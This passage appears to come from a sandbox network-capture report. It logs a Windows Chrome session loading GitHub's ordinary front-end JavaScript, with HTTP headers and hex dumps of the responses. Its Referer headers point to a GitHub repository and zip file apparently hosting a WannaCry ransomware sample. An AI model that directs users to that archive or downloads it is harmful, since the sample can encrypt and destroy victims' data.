                                                                                      2024-03-23 14:47:23 UTC2946INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.1649742185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC688OUTGET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-94209c43e6af.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9822
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 04 Mar 2024 12:40:38 GMT
                                                                                      ETag: 0x8DC3C484B842DBB
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 1569029
                                                                                      X-Served-By: cache-iad-kjyo7100115-IAD, cache-ewr18168-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 51, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 83643c8090f3d497abb5ad835c04d2a5c34f0fa8
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 69 6e 74 6f 2d 76 69 65 77 5f 74 73 22 5d 2c 7b 34 38 36 38 33 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 4f 34 3a 28 29 3d 3e 66 2c 6a 6f 3a 28 29 3d 3e 64 2c 51 70 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 69 3d 6e 28 37 33 30 36 31 29 2c 6f 3d 6e 28 35 39 37 35 33 29 3b 6c 65 74 20 6c 3d 22 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 69 6e 20 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_sticky-scroll-into-view_ts"],{48683:(t,e,n)=>{n.d(e,{O4:()=>f,jo:()=>d,Qp:()=>u});var i=n(73061),o=n(59753);let l="ontransitionend"in window;function s(t)
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6f 66 66 73 65 74 48 65 69 67 68 74 29 7d 66 6f 72 28 6c 65 74 20 74 20 6f 66 28 65 28 29 2c 6e 29 29 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 73 28 74 29 29 7b 6c 65 74 20 65 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2e 68 65 69 67 68 74 3b 74 2e 73 74 79 6c 65 2e 62 6f 78 53 69 7a 69 6e 67 3d 22 22 2c 22 30 70 78 22 3d 3d 3d 65 3f 74 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 60 24 7b 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 7d 70 78 60 3a 74 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 7d 7d 28 69 2c 28 29 3d 3e 7b 63 28 69 2c 6f 29 3b 6c 65 74 20 65 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61
                                                                                      Data Ascii: offsetHeight)}for(let t of(e(),n))if(t instanceof HTMLElement&&s(t)){let e=getComputedStyle(t).height;t.style.boxSizing="","0px"===e?t.style.height=`${t.scrollHeight}px`:t.style.height="0px"}}(i,()=>{c(i,o);let e=u?function(t,e){let n=t.getAttribute("data
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 68 6f 77 6e 22 29 26 26 28 65 3d 21 30 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 22 29 26 26 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 6f 70 65 6e 22 2c 21 65 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 44 65 74 61 69 6c 73 2d 2d 6f 6e 22 2c 21 65 29 2c 65 3d 21 31 29 2c 6e 3d 6e 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 28 30 2c 6f 2e 6f 6e 29 28 22 63 6c 69 63 6b 22 2c 22 2e 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 74 2e 61 6c 74 4b 65 79 2c 6e 3d 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3b 75 28 6e 2c 7b 77 69 74 68 47 72 6f 75 70 3a 65 7d 29
                                                                                      Data Ascii: shown")&&(e=!0),n.classList.contains("js-details-container")&&(n.classList.toggle("open",!e),n.classList.toggle("Details--on",!e),e=!1),n=n.parentElement}(0,o.on)("click",".js-details-target",function(t){let e=t.altKey,n=t.currentTarget;u(n,{withGroup:e})
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 63 6b 22 2c 22 2e 6a 73 2d 73 6b 69 70 2d 74 6f 2d 63 6f 6e 74 65 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 74 61 72 74 2d 6f 66 2d 63 6f 6e 74 65 6e 74 22 29 3b 69 66 28 65 29 7b 6c 65 74 20 74 3d 65 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6b 69 70 70 65 64 2d 74 6f 2d 63 6f 6e 74 65 6e 74 22 2c 22 31 22 29 2c 74 2e 66 6f 63 75 73 28 29 29 7d 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29
                                                                                      Data Ascii: ck",".js-skip-to-content",function(t){let e=document.getElementById("start-of-content");if(e){let t=e.nextElementSibling;t instanceof HTMLElement&&(t.setAttribute("tabindex","-1"),t.setAttribute("data-skipped-to-content","1"),t.focus())}t.preventDefault()
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 67 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 67 29 2c 63 3d 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 79 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 79 28 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 74 3d 21 31 29 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 64 29 69 66 28 65 2e 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3e 30 29 7b 6c 65 74 7b 65 6c 65 6d 65 6e 74 3a 6e 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 69 2c 74 6f 70 3a 6f 7d 3d 65 2c 6c 3d 6e 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 69 66 28 69 29 7b 6c 65 74 20 73 3d 69 2e 67 65 74 42 6f 75 6e 64
                                                                                      Data Ascii: entListener("resize",g),document.removeEventListener("scroll",g),c=!1)}function p(){y(!0)}function g(){y()}function y(t=!1){for(let e of d)if(e.element.offsetHeight>0){let{element:n,placeholder:i,top:o}=e,l=n.getBoundingClientRect();if(i){let s=i.getBound
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 69 73 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 29 72 65 74 75 72 6e 20 65 3b 6c 65 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 6e 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 2c 6e 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 2c 6e 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2e 68 65 69 67 68 74 2c 6e 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 2e 63 6c 61 73 73 4e 61 6d 65 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 6a 73 2d 73 74 69 63 6b 79 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22
                                                                                      Data Ascii: st.contains("is-placeholder"))return e;let n=document.createElement("div");return n.style.visibility="hidden",n.style.display="none",n.style.height=window.getComputedStyle(t).height,n.className=t.className,n.classList.remove("js-sticky"),n.classList.add("
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3e 74 2e 65 6c 65 6d 65 6e 74 29 2e 69 6e 64 65 78 4f 66 28 74 29 3b 64 2e 73 70 6c 69 63 65 28 65 2c 31 29 7d 29 28 74 29 2c 66 28 29 7d 7d 29 2c 28 30 2c 6c 2e 4e 37 29 28 22 2e 6a 73 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 74 6f 70 2d 73 68 65 6c 66 22 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 48 54 4d 4c 45 6c 65 6d 65 6e 74 2c 61 64 64 28 74 29 7b 76 28 74 29 7d 2c 72 65 6d 6f 76 65 28 29 7b 73 3e 30 26 26 28 72 28 30 29 2c 4c 28 29 2c 70 28 29 29 7d 7d 29 2c 28 30 2c 6c 2e 4e 37 29 28 22 2e 6a 73 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 73 68 65 6c 66 2d 6f 66 66 73 65 74 2d 74 6f 70 2c 20 2e 6a 73 2d 70 6f 73 69 74 69 6f 6e 2d 73 74 69 63 6b 79 22 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 48 54 4d 4c 45 6c 65 6d 65 6e 74 2c 61 64 64 3a 45 7d 29
                                                                                      Data Ascii: >t.element).indexOf(t);d.splice(e,1)})(t),f()}}),(0,l.N7)(".js-notification-top-shelf",{constructor:HTMLElement,add(t){v(t)},remove(){s>0&&(r(0),L(),p())}}),(0,l.N7)(".js-notification-shelf-offset-top, .js-position-sticky",{constructor:HTMLElement,add:E})
                                                                                      2024-03-23 14:47:23 UTC176INData Raw: 29 2c 6f 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 69 73 2d 73 74 75 63 6b 22 29 3b 72 65 74 75 72 6e 20 74 2b 28 21 28 69 3c 30 29 26 26 6f 3f 6e 3a 30 29 7d 2c 30 29 3b 72 65 74 75 72 6e 20 69 2b 73 7d 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 69 6e 74 6f 2d 76 69 65 77 5f 74 73 2d 31 61 36 32 32 31 35 34 64 65 63 38 2e 6a 73 2e 6d 61 70
                                                                                      Data Ascii: ),o=e.classList.contains("is-stuck");return t+(!(i<0)&&o?n:0)},0);return i+s}}}]);//# sourceMappingURL=app_assets_modules_github_sticky-scroll-into-view_ts-1a622154dec8.js.map


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.1649743185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC736OUTGET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-244ee9d9ed77.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16967
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 16:34:26 GMT
                                                                                      ETag: 0x8DC48327157EDE1
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 243894
                                                                                      X-Served-By: cache-iad-kjyo7100101-IAD, cache-ewr18167-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 47, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: f1902db2a93ee338a333d4dace19e25408ce920e
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 61 6a 61 78 2d 65 72 72 6f 72 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 22 2c 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 74 73 22 5d 2c 7b 35 38 33 35 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 48 3a 28 29 3d 3e 6f 2c
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754","ui_packages_soft-navigate_soft-navigate_ts"],{58353:(e,t,r)=>{r.d(t,{H:()=>o,
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 65 6e 64 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6c 6f 72 2d 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 6a 73 2d 72 65 6e 64 65 72 2d 74 61 72 67 65 74 20 70 2d 30 22 0a 20 20 20 20 20 20 64 61 74 61 2d 69 64 65 6e 74 69 74 79 3d 22 24 7b 61 7d 22 0a 20 20 20 20 20 20 64 61 74 61 2d 68 6f 73 74 3d 22 24 7b 6f 2e 6f 72 69 67 69 6e 7d 22 0a 20 20 20 20 20 20 64 61 74 61 2d 74 79 70 65 3d 22 24 7b 72 2e 74 79 70 65 7d 22 0a 20 20 20 20 3e 0a 20 20 20 20 20 20 3c 69 66 72 61 6d 65 0a 20 20 20 20 20 20 20 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 72 65 6e 64 65 72 2d 76 69 65 77 65 72 22 0a 20 20 20 20 20 20 20 20 73 72 63 3d 22 24 7b 53 74 72 69 6e 67 28 6f 29 7d 22 0a 20 20 20 20 20
                                                                                      Data Ascii: render-container color-bg-transparent js-render-target p-0" data-identity="${a}" data-host="${o.origin}" data-type="${r.type}" > <iframe role="presentation" class="render-viewer" src="${String(o)}"
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 3a 60 24 7b 6f 7d 2d 66 75 6c 6c 73 63 72 65 65 6e 60 2c 63 6f 6e 74 65 6e 74 4a 73 6f 6e 3a 70 7d 29 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6c 65 74 20 61 3d 28 30 2c 6e 2e 64 79 29 60 3c 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 0a 20 20 20 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 43 6f 70 79 20 24 7b 72 2e 74 79 70 65 7d 20 63 6f 64 65 22 0a 20 20 20 20 2e 76 61 6c 75 65 3d 24 7b 65 7d 0a 20 20 20 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 79 2d 32 20 6a 73 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 20 70 2d 30 20 64 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 20 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 6f 2d 64 65 6c 61 79 22 0a 20 20 20 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 0a 20 20 20 20 64 61 74 61 2d 63 6f 70 79 2d 66 65 65 64 62 61 63 6b
                                                                                      Data Ascii: r:`${o}-fullscreen`,contentJson:p}),y=function(e,t,r){let a=(0,n.dy)`<clipboard-copy aria-label="Copy ${r.type} code" .value=${e} class="btn my-2 js-clipboard-copy p-0 d-inline-flex tooltipped-no-delay" role="button" data-copy-feedback
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 32 20 39 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 36 20 31 30 2e 39 34 6c 36 2e 37 32 2d 36 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 7a 22 0a 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 3c 2f 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 3e 60 2c 6f 3d 28 30 2c 6e 2e 64 79 29 60 0a 20 20 20 20 3c 64 65 74 61 69 6c 73 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 2d 64 61 72 6b 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 63 6f 6e 74 65 6e 74 73 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 0a 20 20 20 20 20 20 20 20 72 6f 6c 65 3d 22 62 75
                                                                                      Data Ascii: 2 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z" ></path> </svg> </clipboard-copy>`,o=(0,n.dy)` <details class="details-reset details-overlay details-overlay-dark" style="display: contents"> <summary role="bu
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 20 20 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 78 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 35 2e 37 32 20 35 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 31 32 20 31
                                                                                      Data Ascii: fill="currentColor" style="display:inline-block;vertical-align:text-bottom" class="octicon octicon-x" > <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 1
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 64 61 74 61 2d 73 68 6f 77 2d 6f 6e 2d 65 72 72 6f 72 5d 22 29 29 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 65 2e 68 69 64 64 65 6e 3d 21 74 29 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 64 61 74 61 2d 68 69 64 65 2d 6f 6e 2d 65 72 72 6f 72 5d 22 29 29 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 65 2e 68 69 64 64 65 6e 3d 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 69 28 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 69 28 65 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 7b 63 75 72 72 65 6e 74 54 61 72 67 65 74 3a 65 7d 29 7b 65 20 69 6e 73 74 61
                                                                                      Data Ascii: rySelectorAll("[data-show-on-error]"))e instanceof HTMLElement&&(e.hidden=!t);for(let e of r.querySelectorAll("[data-hide-on-error]"))e instanceof HTMLElement&&(e.hidden=t)}}function d(e){i(e,!1)}function l(e){i(e,!0)}function s({currentTarget:e}){e insta
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 2e 2e 2e 6c 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 72 65 6e 64 65 72 2d 66 61 69 6c 65 64 22 29 3b 6c 65 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 6e 2e 64 79 29 60 3c 70 3e 55 6e 61 62 6c 65 20 74 6f 20 72 65 6e 64 65 72 20 72 69 63 68 20 64 69 73 70 6c 61 79 3c 2f 70 3e 60 3b 69 66 28 22 22 21 3d 3d 65 29 7b 6c 65 74 20 72 3d 65 2e 73 70 6c 69 74 28 22 5c 6e 22 29 3b 74 3d 28 30 2c 6e 2e 64 79 29 60 3c 70 3e 3c 62 3e 55 6e 61 62 6c 65 20 74 6f 20 72 65 6e 64 65 72 20 72 69 63 68 20 64 69 73 70 6c 61 79 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 70 3e 24 7b 72 2e 6d 61 70 28 65 3d 3e 28 30 2c 6e 2e 64 79 29 60 24 7b 65 7d 3c 62 72 20 2f 3e 60 29
                                                                                      Data Ascii: assList.remove(...l),e.classList.add("is-render-failed");let r=function(e){let t=(0,n.dy)`<p>Unable to render rich display</p>`;if(""!==e){let r=e.split("\n");t=(0,n.dy)`<p><b>Unable to render rich display</b></p> <p>${r.map(e=>(0,n.dy)`${e}<br />`)
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7c 7c 22 72 65 6e 64 65 72 22 21 3d 3d 74 2e 74 79 70 65 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 69 64 65 6e 74 69 74 79 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 74 2e 69 64 65 6e 74 69 74 79 3b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 62 6f 64 79 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 2e 62 6f 64 79 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 72 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 60 2e 6a 73 2d 72 65 6e 64 65 72 2d 74 61 72 67 65 74 5b 64 61 74 61 2d 69 64 65 6e 74 69 74 79 3d 22 24 7b 74 7d 22 5d 60 29 3b 72 65 74 75 72 6e 20 72 26 26 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 72 3a 6e 75 6c 6c 7d 28 64 6f 63 75 6d 65 6e 74 2c 72 29
                                                                                      Data Ascii: ||"render"!==t.type||"string"!=typeof t.identity)return;let r=t.identity;if("string"!=typeof t.body)return;let n=t.body,o=function(e,t){let r=e.querySelector(`.js-render-target[data-identity="${t}"]`);return r&&r instanceof HTMLElement?r:null}(document,r)
